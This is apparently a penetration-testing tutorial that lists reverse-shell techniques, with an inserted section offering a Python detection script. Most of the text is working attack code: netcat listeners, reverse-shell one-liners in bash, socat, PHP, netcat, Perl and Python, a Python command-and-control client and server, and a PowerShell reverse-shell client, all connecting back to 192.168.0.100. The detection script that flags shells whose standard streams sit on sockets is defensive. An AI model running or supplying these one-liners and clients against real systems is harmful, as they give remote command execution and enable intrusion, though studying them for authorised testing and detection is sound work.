In this article I present some options that can be useful during a PenTest for establishing a reverse connection (reverse shell) to servers and to users' workstations.

Start nc (Netcat) listening on port 80.
Linux:
nc -nlvp 80

Run:
Linux:
exec 5<>/dev/tcp/192.168.0.100/80; cat <&5 | while read line; do $line 2>&5 >&5; done

Run the commands:
Linux:
hostname
ls -l

Start nc (Netcat) listening on port 80.
Linux:
nc -nlvp 80

Run:
Linux:
bash -i >& /dev/tcp/192.168.0.100/80 0>&1

Run the command:
Linux:
hostname

Start nc (Netcat) listening on port 80.
Linux:
nc -nlvp 80

Run:
Linux:
socat tcp:192.168.0.100:80 exec:'bash -i',pty,stderr,setsid,sigint,sane

Run the command:
Linux:
hostname

Start nc (Netcat) listening on port 80.
Linux:
nc -nlvp 80

Run:
Linux:
php -r '$sock=fsockopen("192.168.0.100",80);exec("/bin/bash -i <&3 >&3 2>&3");'

Connection established!

Start nc (Netcat) listening on port 80.
Linux:
nc -nlvp 80

Run:
Linux:
nc -e /bin/bash 192.168.0.100 80

Run the command:
Linux:
hostname

Start nc (Netcat) listening on port 80.
Linux:
nc -nlvp 80

Run:
Linux:
mkfifo /tmp/remoto;nc 192.168.0.100 80 0< /tmp/remoto | /bin/bash -i 2>&1 | tee /tmp/remoto

Connection established!

Start nc (Netcat) listening on port 80.
Linux:
nc -nlvp 80

Run:
Linux:
perl -e 'use Socket;$i="192.168.0.100";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Connection established!

Start nc (Netcat) listening on port 80.
Linux:
nc -nlvp 80

Run:
Linux:
python3 -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Connection established!
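From the defender's side, all of the one-liners above share one artefact: the shell (or interpreter) ends up with file descriptors 0, 1 and 2 attached to a TCP socket rather than a terminal, whether via /dev/tcp, dup2(), nc -e or socat's exec:. The script below is an added example (not code from the original article) that walks /proc on Linux and flags such processes; the SHELLS set of process names is an assumption to tune per host.

```python
"""Flag processes whose standard streams are sockets (reverse-shell indicator).

Added defensive example, not code from the original post. Every one-liner above
leaves a shell with fds 0/1/2 on a TCP socket (/dev/tcp, dup2, nc -e, socat),
so on Linux /proc/<pid>/fd/{0,1,2} resolve to "socket:[inode]" instead of a tty.
"""
import os
from typing import Dict, List

# Process names worth checking (assumption: adjust to the host's baseline)
SHELLS = {"bash", "sh", "dash", "zsh", "ash", "python3", "perl", "php", "nc", "socat"}

def stdio_on_socket(fd_targets: Dict[int, str]) -> bool:
    """True if any of fds 0, 1 or 2 resolves to a socket."""
    return any(fd_targets.get(fd, "").startswith("socket:[") for fd in (0, 1, 2))

def classify(comm: str, fd_targets: Dict[int, str]) -> str:
    """'suspicious' when a shell/interpreter has its stdio on a socket, else 'ok'."""
    if os.path.basename(comm) in SHELLS and stdio_on_socket(fd_targets):
        return "suspicious"
    return "ok"

def read_fd_targets(pid: int) -> Dict[int, str]:
    """Read /proc/<pid>/fd/{0,1,2} link targets; unreadable entries are skipped."""
    targets: Dict[int, str] = {}
    for fd in (0, 1, 2):
        try:
            targets[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:  # process exited, or not ours (other users need root)
            pass
    return targets

def scan_proc() -> List[int]:
    """Walk /proc and return the PIDs classified as suspicious."""
    hits = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
        except OSError:
            continue
        if classify(comm, read_fd_targets(pid)) == "suspicious":
            hits.append(pid)
    return hits

if __name__ == "__main__":
    for pid in scan_proc():
        print(f"PID {pid}: shell with stdio on a socket")
```

Run it as root to see other users' descriptors; a hit is a lead to check /proc/<pid>/cmdline and the socket's peer address, since socket-activated services can legitimately look the same.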

Run the server.py script.
Linux:
import socket
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 80
# send 1024 (1kb) a time (as buffer size)
BUFFER_SIZE = 1024
# create a socket object
s = socket.socket()
# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
# accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Conectado!")
# just sending a message, for demonstration purposes
message = "Conexao estabelecida com sucesso!".encode()
client_socket.send(message)
while True:
    # get the command from prompt
    command = input("Digite um comando: ")
    # send the command to the client
    client_socket.send(command.encode())
    if command.lower() == "exit":
        # if the command is exit, just break out of the loop
        break
    # retrieve command results
    results = client_socket.recv(BUFFER_SIZE).decode()
    # print them
    print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close()

Run the client.py script.
Linux:
import socket
import subprocess
SERVER_HOST = "192.168.0.100"
SERVER_PORT = 80
BUFFER_SIZE = 1024
# create the socket object
s = socket.socket()
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))
# receive the greeting message
message = s.recv(BUFFER_SIZE).decode()
print("Server:", message)
while True:
    # receive the command from the server
    command = s.recv(BUFFER_SIZE).decode()
    if command.lower() == "exit":
        # if the command is exit, just break out of the loop
        break
    # execute the command and retrieve the results
    output = subprocess.getoutput(command)
    # send the results back to the server
    s.send(output.encode())
# close client connection
s.close()

Run the command:
Linux:
hostname

Start nc (Netcat) listening on port 80.
Linux:
nc -nlvp 80

client.ps1 script.
Windows:
$socket = new-object System.Net.Sockets.TcpClient('192.168.0.100', 80);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
    $writer.Write("> ");
    $writer.Flush();
    $read = $null;
    while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
    if(!$out.equals("exit")){
        $out = $out.split(' ')
        $res = [string](&$out[0] $out[1..$out.length]);
        if($res -ne $null){ $writer.WriteLine($res)}
    }
}While (!$out.equals("exit"))
$writer.close();$socket.close();

Run the client.ps1 script.
Windows:
powershell -ExecutionPolicy Bypass -File .\client.ps1

Run the commands:
Linux:
hostname
dir
